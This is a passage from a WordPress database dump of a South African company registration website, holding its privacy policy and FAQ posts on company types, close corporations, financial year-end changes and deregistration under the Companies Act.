10:56:43','<h2>Privacy Policy for www.companyregistration.online</h2>\r\nAt www.companyregistration.online, the privacy of our visitors is of extreme importance to us. This privacy policy document outlines the types of personal information is received and collected by www.companyregistration.online and how it is used.\r\n<h3>Log Files</h3>\r\nLike many other Web sites, www.companyregistration.online makes use of log files. The information inside the log files includes internet protocol ( IP ) addresses, type of browser, Internet Service Provider ( ISP ), date/time stamp, referring/exit pages, and number of clicks to analyze trends, administer the site, track user\'s movement around the site, and gather demographic information. IP addresses, and other such information are not linked to any information that is personally identifiable.\r\n<h3>Cookies and Web Beacons</h3>\r\nwww.companyregistration.online does use cookies to store information about visitor preferences, record user-specific information on which pages the user access or visit, customize web page content based on visitor browser type or other information that the visitor sends via their browser.\r\n<h3>DoubleClick DART Cookie</h3>\r\nGoogle, as a third party vendor, may use cookies to serve ads on www.companyregistration.online\r\nGoogle\'s use of the DART cookie enables it to serve ads to users based on their visit to www.companyregistration.online and other sites on the Internet.\r\nUsers may opt out of the use of the DART cookie by visiting the advertising opt-out page or by visiting Google ad and content network privacy policy at the following URL http://www.google.com/privacy_ads.html\r\nSome of our advertising partners may use cookies and web beacons on our site. Our advertising partners include Google Adsense.\r\n\r\nThese third-party ad servers or ad networks use technology to the advertisements and links that appear on www.companyregistration.online send directly to your browsers. They automatically receive your IP address when this occurs. Other technologies (such as cookies, JavaScript, or Web Beacons ) may also be used by the third-party ad networks to measure the effectiveness of their advertisements and / or to personalize the advertising content that you see.\r\n\r\nwww.companyregistration.online has no access to or control over these cookies that are used by third-party advertisers.\r\n\r\nYou should consult the respective privacy policies of these third-party ad servers for more detailed information on their practices as well as for instructions about how to opt-out of certain practices. www.companyregistration.online\'s privacy policy does not apply to, and we cannot control the activities of, such other advertisers or web sites.\r\n\r\nIf you wish to disable cookies, you may do so through your individual browser options. More detailed information about cookie management with specific web browsers can be found at the browsers\' respective websites.\r\n<h3>Google Analytics</h3>\r\nGoogle Analytics is a web analytics tool that helps website owners understand how visitors interact with their website. Google Analytics customers can view a variety of reports about how visitors engage with their website so they can improve it. Google Analytics collects information anonymously. It reports website trends without identifying individual visitors. Google Analytics uses first-party cookies which are used to store information, such as what time the current visit occurred, whether the visitor has been to the site before, and what site referred the visitor to the web page. Browsers do not share first-party cookies across domains.\r\n\r\nGoogle Analytics collects the IP address of website visitors in order to provide website owners a sense of where in the world their visitors come from. Google Analytics does not report the actual IP address information to Google Analytics customers. However, personal information of a visitor (such as e-mail address) is not collected by Google Analytics.\r\n\r\nwww.companyregistration.online uses Google Analytics to track visitor interactions. If you do not wish to share data about your site visit you may disable cookies through your individual browser options. More detailed information about cookie management with specific web browsers can be found at the browsers\' respective websites.','Privacy','','publish','closed','closed','','privacy','','','2016-04-07 12:56:43','2016-04-07 10:56:43','',0,'https://companyregistration.online/?page_id=295',0,'page','',0),(297,1,'2016-04-07 12:57:52','2016-04-07 10:57:52',' ','','','publish','closed','closed','','297','','','2018-05-20 12:35:57','2018-05-20 10:35:57','',0,'https://companyregistration.online/?p=297',3,'nav_menu_item','',0),(298,1,'2016-04-07 12:57:52','2016-04-07 10:57:52',' ','','','publish','closed','closed','','298','','','2018-05-20 12:35:57','2018-05-20 10:35:57','',0,'https://companyregistration.online/?p=298',2,'nav_menu_item','',0),(309,2,'2016-04-08 10:32:55','2016-04-08 08:32:55','[et_pb_section bb_built=\"1\"][et_pb_row][et_pb_column type=\"4_4\"][et_pb_text _builder_version=\"3.0.69\" background_layout=\"light\" text_orientation=\"left\" border_style=\"solid\"]\r\n<div class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\">\r\n\r\n<span style=\"color: #800080;\"><strong>What are the types of companies that can be registered in terms of the New Companies Act 71, 2008?</strong></span>\r\n<div id=\"ccm-remo-expand-content-1557\" class=\"ccm-remo-expand-content box\">\r\n<ul>\r\n 	<li>Private company (Pty) Ltd</li>\r\n 	<li>Public company (Ltd)</li>\r\n 	<li>State-owned company (SOC)</li>\r\n 	<li>External company</li>\r\n 	<li>Personal liability company (Inc)</li>\r\n 	<li>Non-profit company (NPC)</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-1557\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\"> </span></div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-1556\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\"><strong>What is a private company?</strong></span></div>\r\n<div id=\"ccm-remo-expand-content-1556\" class=\"ccm-remo-expand-content box\">\r\n\r\nPrivate companies are comparable to companies of the same status under the Companies Act, 1973 and are characterised by the following:\r\n<ul>\r\n 	<li>They are subject to fewer disclosure and transparency requirements.</li>\r\n 	<li>A private company will still be prohibited from offering its shares to the public and the transferability of its shares will be restricted, but it may now have more than 50 shareholders.</li>\r\n 	<li>The name of a private company must end with the expression “Proprietary Limited” or its abbreviation “(Pty) Ltd”.</li>\r\n 	<li>The board of a private company must comprise at least one director, or any other minimum number as stipulated in its MOI. Each incorporator is a first director of the company.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-452\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\"><strong>What is a public company?</strong></span></div>\r\n<div id=\"ccm-remo-expand-content-452\" class=\"ccm-remo-expand-content box\">\r\n\r\nPublic companies are comparable to companies of the same status under the Companies Act, 1973. They are characterised by the following:\r\n• Their MOI permits them to offer shares to the public but restricts limits or negates their right of pre-emption.\r\n• The name of a public company must end with the word “Limited” or its abbreviation, “Ltd”.\r\n• A public company must have at least three directors.\r\n\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div data-expander-speed=\"500\"></div>\r\n<div id=\"ccm-remo-expand-title-631\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\"><strong>What is an external company?</strong></span></div>\r\n<div id=\"ccm-remo-expand-content-631\" class=\"ccm-remo-expand-content box\">\r\n\r\nAn external company is a foreign company that is carrying on business or non-profit activities within the Republic. It must register with the Companies and Intellectual Property Commission (CIPC) within 20 business days after it first begins to conduct activities within the Republic as an external non-profit company (NPC) or as an external company.\r\n\r\n<span style=\"color: #800080;\"><strong>What is a non-profit company?</strong></span>\r\n\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-content-1555\" class=\"ccm-remo-expand-content box\">\r\n\r\nA non-Profit Company is a company that is incorporated for a public benefit . Its income and property are not distributable to its incorporators, members, directors, officers or persons related to any of them, except as reasonable compensation for service rendered. Three (3) persons and 3 directors may form an NPC.\r\n<ul>\r\n 	<li>They are incorporated for a “public benefit purpose”.</li>\r\n 	<li>Income and property may not be distributed to the incorporators, members, directors or officers of a non-profit company, except for reasonable compensation for services rendered by them.</li>\r\n 	<li>The name of a non-profit company will end with “NPC”.</li>\r\n 	<li>A minimum of three persons, called incorporators, must complete and sign the MOI.</li>\r\n 	<li>A minimum of three directors must be appointed.</li>\r\n 	<li>All of a non-profit company’s assets and income must be used to advance its stated objectives, as set out in its MOI.</li>\r\n 	<li>Non-profit companies are subject to a varied application of the Act, as set out in section 10.</li>\r\n</ul>\r\nA special set out fundamental rules for non-profit companies is set out in the Companies Act, 2008. According to these rules, the objects of non-profit companies remain subject to the current principles. Furthermore, on their dissolution, non-profit companies are restricted in terms of the distribution of any residual assets. These special rules also include various other matters unique to non-profit companies.\r\n\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div data-expander-speed=\"500\"></div>\r\n<div id=\"ccm-remo-expand-title-1554\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\"><strong>What is a personal liability company?</strong></span></div>\r\n<div id=\"ccm-remo-expand-content-1554\" class=\"ccm-remo-expand-content box\">\r\n\r\nA personal liability company is comparable to companies contemplated in  the Companies Act, 1973. Its name must end with the word “Incorporated” it meets the criteria for a private company, and its MOI provides that the directors and past directors are jointly and severally liable, together with the company, for any debts and liabilities of the company that were contracted during their respective terms of office.\r\n\r\n<span style=\"color: #800080;\"><strong>What will it cost to register a company?</strong></span>\r\n\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-content-1553\" class=\"ccm-remo-expand-content box\">\r\n<ul>\r\n 	<li>Refer to <a href=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-basic/\">Private Company Registration Owner Managed</a></li>\r\n 	<li>Refer to <a href=\"https://companyregistration.online/shop/company-registration/private-company-customised-moi-full/\">Private Company Registration Multiple Shareholders involved in running the business</a></li>\r\n 	<li>Refer to <a href=\"https://companyregistration.online/shop/company-registration/private-company-customised-moi-full/\">Private Company Registration Multiple Shareholders who are not directly involved in running the business </a></li>\r\n 	<li>Refer to <a href=\"https://companyregistration.online/shop/company-registration/personal-liability-company/\">Personal Liability Company</a></li>\r\n 	<li>Refer to Non-Profit Company</li>\r\n</ul>\r\n</div>\r\n</div>\r\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Company Registration','','publish','open','open','','company-registration','','','2017-08-29 14:46:32','2017-08-29 12:46:32','',0,'https://companyregistration.online/?p=309',0,'post','',0),(314,2,'2016-04-08 11:13:10','2016-04-08 09:13:10','<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-180\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">Can I register a new close corporation (CC)?</span></div>\r\n<div id=\"ccm-remo-expand-content-180\" class=\"ccm-remo-expand-content box\">\r\n\r\nNo, after the implementation of the new Companies Act (Act 71 of 2008) no CC can be registered and no conversions from Companies to CCs will be allowed. However, the existing CCs will be maintained.\r\n\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\"></div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-182\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">How do I go about making amendments to the existing founding statement of a close corporation (i.e. members, accounting officers, financial interest, financial year end, addresses etc)?</span></div>\r\n<ul>\r\n	<li class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\">Refer to <a href=\"https://companyregistration.online/shop/maintaning-your-company/change-in-close-corporation-address/\">Change in Close Corporation address</a></li>\r\n	<li class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\">Refer to <a href=\"https://companyregistration.online/shop/maintaning-your-company/change-in-members/\">Change in CC Member/s</a></li>\r\n</ul>\r\n</div>\r\n<div class=\"ccm-remo-expand\"></div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-184\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">What is the registration number of a close corporation?</span></div>\r\n<div id=\"ccm-remo-expand-content-184\" class=\"ccm-remo-expand-content box\">\r\n\r\nThis can be looked up on the system by using the Name Search function.\r\n\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\"></div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-186\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">What are the addresses of this entity?</span></div>\r\n<div id=\"ccm-remo-expand-content-186\" class=\"ccm-remo-expand-content box\">\r\n\r\nBoth the postal and the physical address of the business can be derived from the founding statement, or contact the CC.\r\n\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-187\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">Can a trading name also be reflected on close corporation forms?</span></div>\r\n<div id=\"ccm-remo-expand-content-187\" class=\"ccm-remo-expand-content box\">\r\n\r\nNo, a trading name should not be reflected on the close corporation forms.\r\n\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-188\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">Can all members of a close corporation be foreigners?</span></div>\r\n<div id=\"ccm-remo-expand-content-188\" class=\"ccm-remo-expand-content box\">\r\n\r\nYes, as long as the registered address of the close corporation and that of the accounting officer is in South Africa. Also important: If no identity document has been issued, a member or a foreign national should provided the following, stating:\r\n<ul>\r\n	<li>Date of birth, (also to be filled in on the form in place of the identity number)</li>\r\n	<li>Reason why no identity documents can be supplied/which nationality they belong to.</li>\r\n	<li>Expired passports are not accepted.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-189\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">What happens to a close corporation if the accounting officer insists that he has not consented to his appointment as accounting officer of the close corporation?</span></div>\r\n<div id=\"ccm-remo-expand-content-189\" class=\"ccm-remo-expand-content box\">\r\n\r\nThis implies that the letter of consent was obtained fraudulently and that appropriate steps can be taken through the office of the Commercial Crime Unit of the South African Police Services. In terms of the Close Corporations Act the corporation should within 14 days appoint another accounting officer. If the office of the accounting officer is vacant for a period of six months or longer, any person who was a member during that period and is aware of the vacancy shall be personally liable for every debt incurred while the vacancy existed. Since the accounting officer did not consent to being appointed, the liability also exists for the period from the fraudulent appointment.\r\n\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-190\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">Can a close corporation be registered as a training institution?</span></div>\r\n<div id=\"ccm-remo-expand-content-190\" class=\"ccm-remo-expand-content box\">\r\n\r\nYes. However its mere registration as a close corporation does not confer recognition as a training institute. There are other requirements prescribed by the Department of Education and Training, which must be complied with.\r\n\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-191\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">Can a close corporation or a company be a member of a close corporation?</span></div>\r\n<div id=\"ccm-remo-expand-content-191\" class=\"ccm-remo-expand-content box\">\r\n\r\nNo, only a natural person or a inter vivos trust/testamentary trust can become a member.\r\n\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-197\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\">\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-2768\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">Can a company apply for a change of its financial year end?</span></div>\r\n<div class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\">Yes.  A company may change its financial year end with CIPC which must comply with the following requirements;-</div>\r\n<div id=\"ccm-remo-expand-content-2768\" class=\"ccm-remo-expand-content box\">\r\n\r\n(1)    it must be the first change of the financial year end for a specific year, as  a company may only change its financial year end once during a particular financial year,\r\n(2)    the current financial year must not have ended,\r\n(3)    the new financial year end must be later than the date of the filing of the Form with the CIPC,\r\n(4)    the new financial year end  may not result in a financial year longer than  15 months; and\r\n(5)    the form  must be signed by an active director, company secretary or other authorised person of the company.\r\n\r\nIn order to determine whether the formcomplies with the above requirements, the day, month and year of the current financial year end, as well as the new financial year end, must be clearly specified on the form.\r\n\r\n<span style=\"color: #800080;\">Can a company file a change in financial year end for a financial year that already ended?</span>\r\n\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-content-2770\" class=\"ccm-remo-expand-content box\">\r\n\r\nNo.  The form  must be filed with the CIPC before the last day of its new proposed financial year end.  Thus if the current financial year end is 28 February 2013 and the new proposed financial year end is 31 December 2012, the form must be filed with the CIPC before 31 December 2012.\r\n\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-3548\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">How does CIPC calculate the financial year period?</span></div>\r\n<div id=\"ccm-remo-expand-content-3548\" class=\"ccm-remo-expand-content box\">\r\n\r\nThe form  provides for two fields that must be completed, namely the “current financial year end” and the “new financial year end”.  The date provided as the current financial year end is counted as month 12, unless the year was shorter due to a previous change in financial year end, in which case such period is used (example 8 months).  Each month after the indicated current financial year end is then counted together with the number of months in the current financial year until a count of 15 is reached.\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td>Current financial year end:  February 2012 (1 March 2011 to 29 February 2012)\r\nNew financial year end:  July 2012<strong>Calculation</strong>:\r\nFebruary 2012 = month 12\r\nMarch 2012 = month 13\r\nApril 2012 = month 14\r\nMay 2012 = month 15\r\nJune 2012 = month 16 (exceeds 15 months)\r\nJuly 2012 = month 17 (exceeds 15 months)</td>\r\n<td>Current financial year end:  February 2012 (1 May 2011 to 29 February 2012)\r\nNew financial year end:  July 2012<strong>Calculation</strong>:\r\nFebruary 2012 = month 10\r\nMarch 2012 = month 11\r\nApril 2012 = month 12\r\nMay 2012 = month 13\r\nJune 2012 = month 14\r\nJuly 2012 = month 15</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"></div>\r\n<div id=\"ccm-remo-expand-title-2772\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">If the original form  was filed in time but queried, will CIPC except and process the corrected form  after the current financial year end?</span></div>\r\n<div class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"></div>\r\n<div class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\">Yes.  In such cases the corrected form must be accompanied by the original query letter from CIPC that confirms that the original filing occurred in time.</div>\r\n<div class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\">I<span style=\"color: #800080;\">s blue-ink acceptable when completing documents for registration?</span></div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-content-200\" class=\"ccm-remo-expand-content box\">\r\n\r\nNo, black ink or typed. Scanned copies of documents are not accepted.\r\n\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-201\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">Who qualifies to act as an accounting officer of a close corporation?</span></div>\r\n<div id=\"ccm-remo-expand-content-201\" class=\"ccm-remo-expand-content box\">\r\n\r\nThe person should be a member of one of the following Accounting and Auditing professions :\r\n\r\nThe South African Institute of Chartered Accountants (SAICA)\r\n<ul>\r\n	<li>Auditors registered in terms of the provisions of the Auditing Profession Act, 2005(CA)</li>\r\n	<li>The Southern African Institute of Chartered Secretaries and Administrators (ICSA)</li>\r\n	<li>The Chartered Institute of Management Accountants (CIMA)</li>\r\n	<li>The South African Institute of Professional Accountants (SAIPA)</li>\r\n	<li>THE IAC who have obtained the Diploma in Accountancy (IAC)</li>\r\n	<li>The Association of Chartered Certified Accountants (ACCA)</li>\r\n	<li>The Chartered Institute of Business Management (MCIBM)</li>\r\n	<li>The South African Institute of Business Accountants (SAIBA)</li>\r\n	<li>The South African Institute of Government Auditors (SAIGA)</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-202\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">Will it be acceptable if my signature appear anywhere on the form except on the prescribed space?</span></div>\r\n<div id=\"ccm-remo-expand-content-202\" class=\"ccm-remo-expand-content box\">\r\n\r\nNo. To prevent fraud from being committed a person must sign on the prescribed space and the signature must appear on the document before registration. Any signature appearing elsewhere on the document will be regarded as invalid.\r\n\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-206\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">How can a member be removed from a close corporation?</span></div>\r\n<div id=\"ccm-remo-expand-content-206\" class=\"ccm-remo-expand-content box\">\r\n\r\nA court order will have to be obtained against the member who has to be removed in terms of the CC Act.\r\n<ul>\r\n	<li>Refer to <a href=\"https://companyregistration.online/shop/maintaning-your-company/change-in-members/\">Change in CC Member/s</a></li>\r\n</ul>\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-208\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">Who can sign for a deceased member of a close corporation?</span></div>\r\n<div id=\"ccm-remo-expand-content-208\" class=\"ccm-remo-expand-content box\">\r\n\r\n The CC Act regulates it and is subject to any other arrangement in an association agreement. If the executor cannot transfer the interest accordingly within 28 days after his appointment, he should request the existing member to lodge an amended founding statement appointing him as representative (nomine officii) of the deceased member. The executor can then when appropriate, transfer that interest accordingly. Before the deceased member’s interest can be transferred, consent from the existing member(s) should first be obtained. If consent is not given within 28 days, the executor shall sell the interest to the corporation if there are any other members, to any remaining member proportionally to his interest or as otherwise agreed upon or to any other person who qualifies.\r\n\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-209\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">Can a minor be a member of a close corporation?</span></div>\r\n<div id=\"ccm-remo-expand-content-209\" class=\"ccm-remo-expand-content box\">\r\n\r\nYes, if his parent or guardian consent to it. A minor is a person younger than 18 years. Consent is given on the form. The guardian signs on behalf of or with the minor but the details of the minor are recorded. The guardian should also indicate below his signature his full names and relationship to the minor.\r\n\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-210\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">What is the difference between liquidation and deregistration process of a close corporation?</span></div>\r\n<div id=\"ccm-remo-expand-content-210\" class=\"ccm-remo-expand-content box\">\r\n\r\nLiquidation implies that the business of an entity will cease and that its restoration will only be for the purposes of recovering some outstanding debts and that will not mean an entity can go on with business. Deregistration means that even if the entity has no legal status anymore it can go on with business operations. In both processes members remain severally and jointly liable for any irregularities that may have occurred when they were still acting as such.\r\n\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-215\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">How long does the deregistration process take, and why?</span></div>\r\n<div id=\"ccm-remo-expand-content-215\" class=\"ccm-remo-expand-content box\">\r\n\r\nThe deregistration process can be finalised within 3 months. Other factors like the responses from the South African Receiver of Revenue, The Worksmen\'s Compensation Commissioner and the Unemployment Insurance Commissioner affect the period of the finalisation of the process.\r\n\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-216\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">Can this process of deregistration be stopped or cancelled?</span></div>\r\n<div id=\"ccm-remo-expand-content-216\" class=\"ccm-remo-expand-content box\">\r\n\r\nYes, the process can be cancelled/stopped by way of a letter even if it is a faxed request. This happens normally if there is property involved or where the legal entity decides to resumes its business operations.\r\n\r\n</div>\r\n</div>','Close Corporations','','publish','open','open','','close-corporations','','','2016-04-08 14:10:32','2016-04-08 12:10:32','',0,'https://companyregistration.online/?p=314',0,'post','',0),(319,2,'2016-04-08 11:57:17','2016-04-08 09:57:17','','Tax Registrations','','draft','open','open','','tax-registrations','','','2018-05-11 12:20:31','2018-05-11 10:20:31','',0,'https://companyregistration.online/?p=319',0,'post','',0),(322,2,'2016-04-08 12:04:55','2016-04-08 10:04:55','<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-2768\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">Can a company apply for a change of its financial year end?</span></div>\r\n<div class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\">Yes.  A company may change its financial year end with CIPC which must comply with the following requirements;-</div>\r\n<div id=\"ccm-remo-expand-content-2768\" class=\"ccm-remo-expand-content box\">\r\n\r\n(1)    it must be the first change of the financial year end for a specific year, as  a company may only change its financial year end once during a particular financial year,\r\n(2)    the current financial year must not have ended,\r\n(3)    the new financial year end must be later than the date of the filing of the Form with the CIPC,\r\n(4)    the new financial year end  may not result in a financial year longer than  15 months; and\r\n(5)    the form  must be signed by an active director, company secretary or other authorised person of the company.\r\n\r\nIn order to determine whether the form complies with the above requirements, the day, month and year of the current financial year end, as well as the new financial year end, must be clearly specified on the form.\r\n\r\n<span style=\"color: #800080;\">Can a company file a change in financial year end for a financial year that already ended?</span>\r\n\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-content-2770\" class=\"ccm-remo-expand-content box\">\r\n\r\nNo.  The form  must be filed with the CIPC before the last day of its new proposed financial year end.  Thus if the current financial year end is 28 February 2013 and the new proposed financial year end is 31 December 2012, the form must be filed with the CIPC before 31 December 2012.\r\n\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-3548\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">How does CIPC calculate the financial year period?</span></div>\r\n<div id=\"ccm-remo-expand-content-3548\" class=\"ccm-remo-expand-content box\">\r\n\r\nThe form  provides for two fields that must be completed, namely the “current financial year end” and the “new financial year end”.  The date provided as the current financial year end is counted as month 12, unless the year was shorter due to a previous change in financial year end, in which case such period is used (example 8 months).  Each month after the indicated current financial year end is then counted together with the number of months in the current financial year until a count of 15 is reached.\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td>Current financial year end:  February 2012 (1 March 2011 to 29 February 2012)\r\nNew financial year end:  July 2012<strong>Calculation</strong>:\r\nFebruary 2012 = month 12\r\nMarch 2012 = month 13\r\nApril 2012 = month 14\r\nMay 2012 = month 15\r\nJune 2012 = month 16 (exceeds 15 months)\r\nJuly 2012 = month 17 (exceeds 15 months)</td>\r\n<td>Current financial year end:  February 2012 (1 May 2011 to 29 February 2012)\r\nNew financial year end:  July 2012<strong>Calculation</strong>:\r\nFebruary 2012 = month 10\r\nMarch 2012 = month 11\r\nApril 2012 = month 12\r\nMay 2012 = month 13\r\nJune 2012 = month 14\r\nJuly 2012 = month 15</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\">\r\n<div class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"></div>\r\n<div id=\"ccm-remo-expand-title-2772\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">If the original form  was filed in time but queried, will CIPC except and process the corrected form  after the current financial year end?</span></div>\r\n<div class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"></div>\r\n<div class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\">Yes.  In such cases the corrected form must be accompanied by the original query letter from CIPC that confirms that the original filing occurred in time.</div>\r\n</div>\r\n<div class=\"ccm-remo-expand\"></div>\r\n<div class=\"ccm-remo-expand\"></div>\r\n<div class=\"ccm-remo-expand\"></div>','Maintaining your company','','publish','open','open','','change-in-financial-year-end','','','2016-04-08 14:05:33','2016-04-08 12:05:33','',0,'https://companyregistration.online/?p=322',0,'post','',0),(324,2,'2016-04-08 12:09:19','2016-04-08 10:09:19','<div class=\"ccm-remo-expand\">\r\n<div id=\"ccm-remo-expand-title-3549\" class=\"ccm-remo-expand-title ccm-remo-expand-open\" data-expander-speed=\"500\"><span style=\"color: #800080;\">How do I apply for the de-registration of my company or close corporation?</span></div>\r\n<div id=\"ccm-remo-expand-content-3549\" class=\"ccm-remo-expand-content box\">\r\n\r\nA company or close corporation may be deregistered upon request from the company or close corporation or any other third party, provided that the company or close corporation:-\r\n(a)    has ceased to carry on business; and\r\n(b)    has no assets or, because of the inadequacy of its assets, there is no reasonable probability of the company being liquidated.\r\n\r\nIn order for the CIPC to process the deregistration request, the following information is required on an original letter head of either the company, close corporation or any other third person applying for deregistration:-\r\n<ul>\r\n 	<li>Statement confirming that</li>\r\n</ul>\r\n(i)    the company or close corporation is not carrying on business or is dormant and\r\n(ii)   has no assets, or because of the inadequacy of its assets, that there is no reasonable probability of the company being liquidated (if third party, the statement must be supplemented with sufficient documentary proof confirming the statement);\r\n<ul>\r\n 	<li>Tax clearance certificate or any other written confirmation from SARS that no tax liability is outstanding; (an affidavit if 